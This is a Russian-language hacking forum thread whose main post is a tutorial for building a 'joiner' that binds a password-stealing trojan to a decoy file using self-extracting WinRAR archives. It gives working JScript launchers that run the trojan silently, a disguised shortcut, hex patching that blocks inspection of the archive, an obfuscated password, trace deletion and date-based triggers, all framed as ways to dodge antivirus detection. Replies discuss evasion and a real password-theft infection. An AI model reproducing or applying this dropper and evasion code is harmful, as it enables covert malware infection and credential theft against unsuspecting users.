ВАЖНО Делаем крутой крипто-джойнер и обходим детект VT


024

Уважаемый пользователь
Форумчанин
Регистрация
02.01.2014
Сообщения
163
Репутация
201
Можно же и батник сделать за место exe
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Более усовершенствованный способ использования,как выразился автор статьи-"бомжеджойнера".
В этой статье мы постараемся раскрыть тему склейки с помощью подручных средств. Научимся клеить, прятать файлы, ставить хитрые условия запуска и многое другое…
1. Склеиваем.

Всем известно, что sfx-архивы можно использовать в качестве бомжеджойнера. Предлагаю базовый вариант склейки с помощью WinRar. Если изобразить схематично, то работать склейка будет следующим образом:
Начинается все с того, что юзер запускает наш sfx-архив. В настройках архива указан запуск скрипта outside.js, который в свою очередь, запускает обманку, а затем запароленный архив с определенными параметрами. В настройках архива с паролем тоже указан скрипт на запуск, только теперь inside.js. Скрипт запускает троян.
Теперь разберемся, как такое сделать.
Для начала нам нужны 4 файла:

  • Троян (к примеру – адовый пинч)
  • Файл-обманка (к примеру – мега-приватный мануал по бруту ВК)
  • Скрипт inside.js
  • Скрипт outside.js
С первыми двумя файлами вы разберетесь сами, мы же расскажем, что писать в скрипты. Многие кулхацкеры почему то говорят, что надо использовать батники, но моргающее черное окно – это палево, поэтому мы используем Jscript (хотя можно и юзать и Vbscript, отметьте для себя).
JScript является скриптовым языком программирования, разработанным компанией Microsoft©. Хотя данный язык напоминает JavaScript, он имеет отличия, иногда очень заметные. JScript может использоваться для создания приложений, запускаемых локально, то есть с диска пользователя. При этом не требуется установки дополнительного программного обеспечения.


Содержимое файла inside.js:
Код:
var wsws = WScript.CreateObject("WScript.Shell");
//запускаем троян из папки Temp
wsws.Run("pinch.exe -d%temp%",0);
Разумеется, мы можем использовать всю мощь Jscript и обфусцировать данный код до неузнаваемости, но оставим это на другой раз. Следующим шагом будет создание первого sfx-архива (на схемке – sfx_with_pass.exe):
В примере я воспользуюсь winrar’ом. Выставляем настройки:
Имя архива, сжатие, 2 галочки и жмем на “Установить пароль”:
Выбрали пароль, жмем ОК и переходим во вкладку Комментарий:
Можно вставить только это (вы же хотите просто скопировать):
Теперь создадим файл outside.js:
Код:
var wsws = WScript.CreateObject("WScript.Shell");
//-p - пароль к созданному ранее архиву
wsws.Run("sfx_with_pass.exe -pZLAYASATANAPRIDET -d%temp%",0);
//запускаем мануал из папки Temp
wsws.Run("notepad %temp%\\manual.txt",1);
И наконец, создаем еще один архив:
Настраиваем как и раньше, только не ставим пароль. В комментарии пишем:
Код:
Path=%temp%
SavePath
Setup=outside.js
Silent=1
Overwrite=1
Наша бомже-склейка готова. Поздравляю! С помощью этой статьи вы уже можете клеить файлы беспалевнее, чем описано в большинстве мануалов. Никаких всплывающих черных окон от батников, а в качестве бонуса – затык (до поры до времени) сигнатурных антивирусов, которые не могут открыть запароленный архив.

2. Прячем.
Изложенного выше материала хватит чтобы получить плюсик на школо-хеккерном-андирграунт-форуме. Но мы пойдем дальше. И вы сможете даже толкать эту статью под видом охуительного мануала, рублей за 600 (как раз на грамулю гашика хватит).
Для начала откроем нашу склейку с помощью WinRar:
Палево, конечно, диавольское. Даже не одаренный божией искрой отрок поймет, что что-то сатанинское вываливается из этого бесовского архива. Перебьем расширения файлов на более добрые:
Имена файлов, для наглядности, я оставлю такими-же как и были, чтобы вы не запутались. Мы докинем в нашу папку еще один файлик – ярлык help.lnk. Создаем ярлык для любого файла, и меняем его свойства следующим образом:
Меняем рабочую папку, меням значок, ставим окно, в поле объект пишем:
Код:
%systemroot%\System32\cmd.exe /c rename %temp%\outside.gif outside.js
Сохраняем, закрываем свойства, потом опять открываем и меняем в настройках “Расположение”:
Теперь поменяем комментарий к архиву:
Код:
Path=%temp%
SavePath
Setup=help.lnk
Setup=outside.js
SetupCode
Silent=1
Overwrite=1
SetupCode – означает, что пока help.lnk не отработает, outside.js не запустится. (Кто плотно изучал консольку, уже заметил, что можно обойтись вообще одной строчкой Setup=help.lnk, а Setup=outside.js и SetupCode выкинуть, или можно грузить злые файлы только с помощью файла .lnk).
И еще нам придется малость подредактировать файл outside.js:
Код:
var wsws = WScript.CreateObject("WScript.Shell");
//переименовываем архив перед запуском
wsws.Run("cmd.exe /c rename %temp%\\sfx_with_pass.png sfx_with_pass.exe",0);
//Запускаем через вызов cmd, чтобы скрипт не ругался на отсутствие файла.
//-p - пароль к созданному ранее архиву
wsws.Run("cmd.exe /c %temp%\\sfx_with_pass.exe -pZLAYASATANAPRIDET -d%temp%",0);
//запускаем мануал из папки Temp
wsws.Run("notepad %temp%\\manual.txt",1);
Все пашет как и раньше, но теперь, если файл откроют через архиватор, наши файлы хоть и видно, но все расширения абсолютно безобидные (для большинства пользователей). Ничто не мешает закинуть еще 10-15 файлов, до кучи.

3. Прячем глубже.

В прошлом методе есть несколько проблем:



    • sfx_with_pass.exe можно открыть как архив
    • Содержимое sfx_with_pass.exe можно вытащить, зная пароль.
    • В папке temp остается куча мусора.
    • Исходник outside.js никак не защищен
Чтобы архив sfx_with_pass.exe нельзя было открыть, мы его испоганим его в hex-редакторе. Для примера – забьем 2 байтика нулями. Открываем архив sfx_with_pass.exe в любом hex-редакторе (я пользовался WinHex).
Переходим по смещению 400h (скроль мышкой от начала файла, пока не увидишь 000400). И затираем 1 байт нулями (для примера – байт по смещению 430h). То что затерли, запоминаем (в нашем случае было значение 87h).
Сохраняем, пробуем запустить – ноль реакции. Отлична. Теперь сделаем так, чтобы наш архивчик нельзя было открыть через WinRar. Ищем в файле “Rar!“:
Нашли. Теперь тоже затираем 1 байт (букву “R”). Было:
52 61 72 ….
стало:
00 61 72 …
Пробуем открыть наш файл через архиватор:
Чего и добивались.
Но подождите, как же мы запустим наш архив с убер-приватным троянингом? Пропатчим архив перед запуском (нет остановки извращеньям)! Никаких лишних файлов – все проделаем в скрипте outside.js:
Код:
var wsws = WScript.CreateObject("WScript.Shell");
//запускаем мануал из папки Temp
wsws.Run("notepad %temp%\\manual.txt",1);

//файло для потчинга
var file="sfx_with_pass.png";

var inp=new ActiveXObject("ADODB.Stream");
inp.Type=1;
inp.Open();
inp.LoadFromFile(file);

var out=new ActiveXObject("ADODB.Stream");
out.Type=1;
out.Open();

//смещение первого места для потчинга
var position=0x430;
inp.CopyTo(out,position*1);
inp.Read(1);
out.Write(mb2b(eval("'"+"\x87"+"'")));
//вычисляем второе смещение
var position=0x30000-position;
inp.CopyTo(out,(position*1)-1);
inp.Read(1);
out.Write(mb2b(eval("'"+"\x52"+"'")));
inp.CopyTo(out);
//отпут схороняет все в файл
out.SaveToFile("sfx_with_pass.exe",2);
function mb2b(byte){
with(new ActiveXObject("ADODB.Recordset")){
       Fields.Append("x",205,1);
       Open();
       AddNew();
       Fields(0).AppendChunk(byte);
       return Fields(0).GetChunk(1);
   }
}

//-p - пароль к созданному ранее архиву
wsws.Run("cmd.exe /c %temp%\\sfx_with_pass.exe -pZLAYASATANAPRIDET -d%temp%",0);
Проверяем. Пашет. С одной проблемой разобрались. Но как маячит наш пароль – “ZLAYASATANAPRIDET“. Надо его как-то скрыть. Сделаем кодес сумасбродней в нашем илитарнейшем бомжеклее:
Код:
//будет
var _0x72c6=["\x50\x52\x49\x44\x45\x54","\x5A\x4C\x41\x59\x41","\x53\x41\x54\x41\x4E\x41","\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63\x20\x25\x74\x65\x6D\x70\x25\x5C\x73\x66\x78\x5F\x77\x69\x74\x68\x5F\x70\x61\x73\x73\x2E\x65\x78\x65\x20\x2D\x70","\x20\x2D\x64\x25\x74\x65\x6D\x70\x25"];var a=_0x72c6[0];var c=_0x72c6[1];var b=_0x72c6[2];wsws.Run(_0x72c6[3]+c+b+a+_0x72c6[4],0);

//вместо этого
wsws.Run("cmd.exe /c %temp%\\sfx_with_pass.exe -pZLAYASATANAPRIDET -d%temp%",0);
Обыкновенная обфускация, но разница на лицо.
Продолжим… Наш бомжеклей, как и полагается всякому бомжу, оставляет после себя тонны мусора. Это не дело. Надо убираться за бомжиком, если он суко мразь сам не может. Для этого добавим в файленг outside.js:
Код:
//.......
//выше все что было раньше

wsws.Run("cmd.exe /c del %temp%\\manual.txt",2);
wsws.Run("cmd.exe /c del %temp%\\help.lnk",2);
wsws.Run("cmd.exe /c del %temp%\\outside.js",2);
WScript.Sleep(3000);
wsws.Run("cmd.exe /c del %temp%\\sfx_with_pass.png",2);
wsws.Run("cmd.exe /c del %temp%\\sfx_with_pass.exe",2);
wsws.Run("cmd.exe /c del %temp%\\inside.js",2);
И все говнище удаляется. Остается только падлюка пинч, который по идее должен удалиться сам (либо его съест проактивка). Все что нам остается, это накрыть скрипт outside.js обфускатором и наш бомжеклей обретает приятный аромат огуречного лосьона.

Вообще обфускаторов JavaScript очень много, но важно, чтобы эти обфускаторы не били наш код. Ибо мы то писали на Jscript.

4. Финальные штрихи
Нам осталось не так уж и много:

  • Условие файл (наличие, отсутствие)
  • Условие время (день, месяц, час, до даты, после даты)
  • Сборный пасс
  • Сделать иконку (+ HD-иконки)
Для того, чтобы исключить повторный запуск трояна, мы можем встроить в нашу склейку примитивную логику. К примеру, если в корне диска C: есть файлик “uje_zarazili_ne_trogat.txt“, то запускаем только обманку. Если файла нет – запускаем и обманку и наш троян.
Реализуется это довольно просто:

Код:
var wsws = WScript.CreateObject("WScript.Shell");
//добавляем в скрипт
var fso = WScript.CreateObject("Scripting.FileSystemObject");

if (fso.FileExists("C:\\uje_zarazili_ne_trogat.txt")){
   wsws.Run("notepad %temp%\\manual.txt",1);
   wsws.Run("cmd.exe /c del %temp%\\manual.txt",2);
   wsws.Run("cmd.exe /c del %temp%\\help.lnk",2);
   wsws.Run("cmd.exe /c del %temp%\\outside.js",2);
   WScript.Sleep(5000);
   wsws.Run("cmd.exe /c del %temp%\\sfx_with_pass.png",2);
}else {
   //////////////
   //  Остальной кодес (переименование, патчинг архива, запуск, удаление и т.д.)
   //////////////
   wsws.Run("notepad %temp%\\manual.txt",1);
   var a = fso.CreateTextFile("C:\\uje_zarazili_ne_trogat.txt", true);
   a.WriteLine("Zarazili tobi lalka!!!!11111");
   a.Close();
}
Мы можем использовать более сложные условия – запускать троянчег до определенной даты, или после определенной даты, по определенным числам, в определенные часы и т.д. К примеру, троян сработает, если дата больше чем 2014 год, 8 месяц (август), 23 число и 12 часов.
Код:
/.....
time_now = new Date();
time_trigger = new Date("Sat Aug 23 2014 21:53:47 GMT+0400");

if (time_now > time_trigger){
   //Запускаем троян. Либо любой другой код...
   wsws.Run("pinch.exe",1);
}else {
   //Запускаем мануал. Либо любой другой код...
   wsws.Run("notepad %temp%\\false.txt",1);
}
Можно сделать несколько таких условий и запаковать 4-5 билдов с разным криптом (к примеру – 1 крипт на 2-3 дня, главное рассчитать, как быстро палится крипт). Я думаю такая техника может выручить в некоторых условиях.
Мы можем воспользоваться и немного другой техникой. К примеру добавим в пароль переменную, значение которой зависит от числа месяца. И к примеру, наш троян будет отрабатывать только 22 числа, потому что только 22 числа, будет подставляться правильный пароль для открытия sfx-архива.
Чтобы сделать Hd-иконку:

Заходим в любой сервис, делаем из картинки иконку, затем с помощью любого редактора ресурсов добавляем иконку нашем архиву. Вот и все (может еще добавлю, как менять иконки).
5. Заключение.
Наверное ты думаешь, что неплохо бы такую тему автоматизировать и написать соответствующую программу.
Я так не думаю. Данная статья – лишь еще один пример того, как можно соорудить самоходную конструкцию из костылей.

From krober.biz
Статья скопирована с
 

Nedovirus

Уважаемый пользователь
Форумчанин
Регистрация
14.05.2014
Сообщения
399
Репутация
310
все это джаст фо фан и лулз. для сбития чисто сигнарутного детекта при контекстном сканировании можно так с бубном и не танцевать. а при запуске это все равно не поможет - файл будет извлечен и задетектирован.
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
для сбития чисто сигнарутного детекта при контекстном сканировании можно так с бубном и не танцевать.
Это так,но после изучения статьи,можно научиться всяким маленьким фишкам.Для общего развития полезно.
 

DikiySan

Уважаемый пользователь
Форумчанин
Регистрация
22.02.2014
Сообщения
672
Репутация
2 093
Может я не к месту,в последних сэтах по 50 есть такие - уже готовые;)
Открываются все кроме одного,к сожалению не помню какой.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 142
Репутация
8 268
Хочу сказать что такой способ используется больше для маскировки вирусов нежели для обхода детекта АВ.

Что-бы обойти АВ используют другие методы в комплексе с джойнером.

Т.е. это полезная нагрузка, например склейка с картинкой и прочее, жертва открывает картинку а вместе с ним скрыто запускается вирус, для этого и нужен такой джойнер !

Хотя многие даже и не скрывают вирус, сам много раз попадался, на "классный патч к игре" который сливает все сохраненные пароли и после этого самоудаляется !

В этоге все в ауте файл-вирус удалился и при этом всё слил, вот такие-вот дела !Отдыхай!!!
 

Iogan

Пользователь
Форумчанин
Регистрация
19.05.2018
Сообщения
17
Репутация
1
Очень познавательно ! Спасибо за примеры , полезные фишечки с JS ))
 
Верх Низ